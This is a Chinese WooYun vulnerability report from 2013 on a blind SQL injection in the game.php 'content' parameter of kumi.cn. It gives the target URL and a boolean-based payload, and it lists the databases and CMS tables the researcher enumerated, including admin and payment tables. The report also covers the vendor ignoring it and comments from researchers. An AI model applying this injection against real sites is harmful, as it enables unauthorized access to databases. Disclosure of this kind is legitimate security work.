当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045281

漏洞标题:酷米网SQL注入漏洞可拿到服务器权限

相关厂商:kumi.cn

漏洞作者: Ebon_Wolf

提交时间:2013-12-09 11:54

修复时间:2013-12-14 11:54

公开时间:2013-12-14 11:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-09: 细节已通知厂商并且等待厂商处理中
2013-12-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

酷米网游戏页面参数未过滤导致SQL注入漏洞

详细说明:

漏洞测试地址:
www.kumi.cn/360/xiaoyouxi/game.php?content=17613
先说下:只做安全测试不拿shell!!!!
漏洞测试相关结果:
Place: GET
Parameter: content
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content=17613 AND 3739=3739
available databases [15]:
[*] information_schema
[*] kumi_app
[*] kumi_cms2
[*] kumi_dingzhi
[*] kumi_eduflash
[*] kumi_eduflash1
[*] kumi_ipad_donghua
[*] kumi_news
[*] kumi_search
[*] kumi_tudou
[*] kumi_upload
[*] miyadalu
[*] mysql
[*] test
[*] xiaoyouxi
初步检测标段信息:
Database: kumi_cms2
[124 tables]
+---------------------------------------+
| cms_admin |
| cms_admin_role |
| cms_admin_role_priv |
| cms_ads |
| cms_ads_place |
| cms_ads_stat |
| cms_announce |
| cms_area |
| cms_ask |
| cms_ask_actor |
| cms_ask_credit |
| cms_ask_posts |
| cms_ask_vote |
| cms_attachment |
| cms_author |
| cms_block |
| cms_c_cooperate |
| cms_c_down |
| cms_c_flash |
| cms_c_flv |
| cms_c_group |
| cms_c_info |
| cms_c_ku6video |
| cms_c_news |
| cms_c_photo |
| cms_c_picture |
| cms_c_product |
| cms_c_program |
| cms_c_star |
| cms_c_upload |
| cms_c_video |
| cms_c_vod |
| cms_c_voting |
| cms_c_wallpaper |
| cms_c_wallpaper_photo |
| cms_c_yunshi |
| cms_cache_count |
| cms_category |
| cms_collect |
| cms_comment |
| cms_content |
| cms_content_count |
| cms_content_position |
| cms_content_tag |
| cms_copyfrom |
| cms_datasource |
| cms_digg |
| cms_digg_log |
| cms_donghua_pic |
| cms_donghua_pic_bak |
| cms_editor_data |
| cms_hits |
| cms_ipbanned |
| cms_keylink |
| cms_keyword |
| cms_log |
| cms_member |
| cms_member_cache |
| cms_member_detail |
| cms_member_group |
| cms_member_group_extend |
| cms_member_group_priv |
| cms_member_info |
| cms_menu |
| cms_model |
| cms_model_field |
| cms_module |
| cms_mood |
| cms_mood_data |
| cms_order |
| cms_order_deliver |
| cms_order_log |
| cms_pay_card |
| cms_pay_exchange |
| cms_pay_payment |
| cms_pay_pointcard_type |
| cms_pay_stat |
| cms_pay_user_account |
| cms_player |
| cms_position |
| cms_process |
| cms_process_status |
| cms_recommend |
| cms_recommend_info |
| cms_recommend_pic |
| cms_recommend_type |
| cms_role |
| cms_search |
| cms_search_type |
| cms_session |
| cms_sohu |
| cms_sohu_list |
| cms_special |
| cms_special_content |
| cms_status |
| cms_times |
| cms_type |
| cms_urlrule |
| cms_workflow |
| cms_zw_vote |
| cms_zw_voteip |
| disney_diaocha |
| kumi_bless |
| kumi_dell |
| kumi_ef |
| kumi_jiajia |
| kumi_mood |
| kumi_mood_ranking |
| kumi_ndj |
| kumi_player |
| kumi_player_bak |
| kumi_program_bbs_mapping |
| kumi_program_flash_mapping |
| kumi_program_flv_mapping |
| kumi_program_group_mapping |
| kumi_program_photo_mapping |
| kumi_program_star_mapping |
| kumi_program_type_mapping |
| kumi_risi |
| kumi_uploadvideo |
| last_video |
| nicaihua_ip |
| update_contents |
| yunshi |
+---------------------------------------+
太多信息了就不深入了。

漏洞证明:

漏洞测试地址:
www.kumi.cn/360/xiaoyouxi/game.php?content=17613
漏洞测试相关结果:
Place: GET
Parameter: content
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content=17613 AND 3739=3739
available databases [15]:
[*] information_schema
[*] kumi_app
[*] kumi_cms2
[*] kumi_dingzhi
[*] kumi_eduflash
[*] kumi_eduflash1
[*] kumi_ipad_donghua
[*] kumi_news
[*] kumi_search
[*] kumi_tudou
[*] kumi_upload
[*] miyadalu
[*] mysql
[*] test
[*] xiaoyouxi
初步检测标段信息:
Database: kumi_cms2
[124 tables]
+---------------------------------------+
| cms_admin |
| cms_admin_role |
| cms_admin_role_priv |
| cms_ads |
| cms_ads_place |
| cms_ads_stat |
| cms_announce |
| cms_area |
| cms_ask |
| cms_ask_actor |
| cms_ask_credit |
| cms_ask_posts |
| cms_ask_vote |
| cms_attachment |
| cms_author |
| cms_block |
| cms_c_cooperate |
| cms_c_down |
| cms_c_flash |
| cms_c_flv |
| cms_c_group |
| cms_c_info |
| cms_c_ku6video |
| cms_c_news |
| cms_c_photo |
| cms_c_picture |
| cms_c_product |
| cms_c_program |
| cms_c_star |
| cms_c_upload |
| cms_c_video |
| cms_c_vod |
| cms_c_voting |
| cms_c_wallpaper |
| cms_c_wallpaper_photo |
| cms_c_yunshi |
| cms_cache_count |
| cms_category |
| cms_collect |
| cms_comment |
| cms_content |
| cms_content_count |
| cms_content_position |
| cms_content_tag |
| cms_copyfrom |
| cms_datasource |
| cms_digg |
| cms_digg_log |
| cms_donghua_pic |
| cms_donghua_pic_bak |
| cms_editor_data |
| cms_hits |
| cms_ipbanned |
| cms_keylink |
| cms_keyword |
| cms_log |
| cms_member |
| cms_member_cache |
| cms_member_detail |
| cms_member_group |
| cms_member_group_extend |
| cms_member_group_priv |
| cms_member_info |
| cms_menu |
| cms_model |
| cms_model_field |
| cms_module |
| cms_mood |
| cms_mood_data |
| cms_order |
| cms_order_deliver |
| cms_order_log |
| cms_pay_card |
| cms_pay_exchange |
| cms_pay_payment |
| cms_pay_pointcard_type |
| cms_pay_stat |
| cms_pay_user_account |
| cms_player |
| cms_position |
| cms_process |
| cms_process_status |
| cms_recommend |
| cms_recommend_info |
| cms_recommend_pic |
| cms_recommend_type |
| cms_role |
| cms_search |
| cms_search_type |
| cms_session |
| cms_sohu |
| cms_sohu_list |
| cms_special |
| cms_special_content |
| cms_status |
| cms_times |
| cms_type |
| cms_urlrule |
| cms_workflow |
| cms_zw_vote |
| cms_zw_voteip |
| disney_diaocha |
| kumi_bless |
| kumi_dell |
| kumi_ef |
| kumi_jiajia |
| kumi_mood |
| kumi_mood_ranking |
| kumi_ndj |
| kumi_player |
| kumi_player_bak |
| kumi_program_bbs_mapping |
| kumi_program_flash_mapping |
| kumi_program_flv_mapping |
| kumi_program_group_mapping |
| kumi_program_photo_mapping |
| kumi_program_star_mapping |
| kumi_program_type_mapping |
| kumi_risi |
| kumi_uploadvideo |
| last_video |
| nicaihua_ip |
| update_contents |
| yunshi |
+---------------------------------------+
太多信息了就不深入了。

修复方案:

通过以上获取的信息你们应该知道怎么处理了。
game.php 参数过滤,SQL注入嘛,程序员懂的。
要过年啦,多给点赏钱就好。

版权声明:转载请注明来源 Ebon_Wolf@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-14 11:54

厂商回复:

最新状态:

2013-12-16:已经修改了。多谢


漏洞评价:

评论

  1. 2013-12-14 15:02 | Ebon_Wolf ( 实习白帽子 | Rank:48 漏洞数:24 | 您好,我似咣咚朲,需要服务吗?专业酱油工...)

    这个既然可以忽略那么我就直接点吧

  2. 2013-12-14 15:19 | Ebon_Wolf ( 实习白帽子 | Rank:48 漏洞数:24 | 您好,我似咣咚朲,需要服务吗?专业酱油工...)

    @乌云,这样的厂商我要怎么说呢?

  3. 2013-12-16 17:20 | Ebon_Wolf ( 实习白帽子 | Rank:48 漏洞数:24 | 您好,我似咣咚朲,需要服务吗?专业酱油工...)

    rank:0哈哈 @北京酷米网络科技有限公司

  4. 2013-12-17 23:19 | Huc-Unis ( 普通白帽子 | Rank:1055 漏洞数:292 | 诶,现在通用奖励越来越低了;离买保时捷卡...)

    明显这个厂商已经不上线了!不需要找他的漏洞了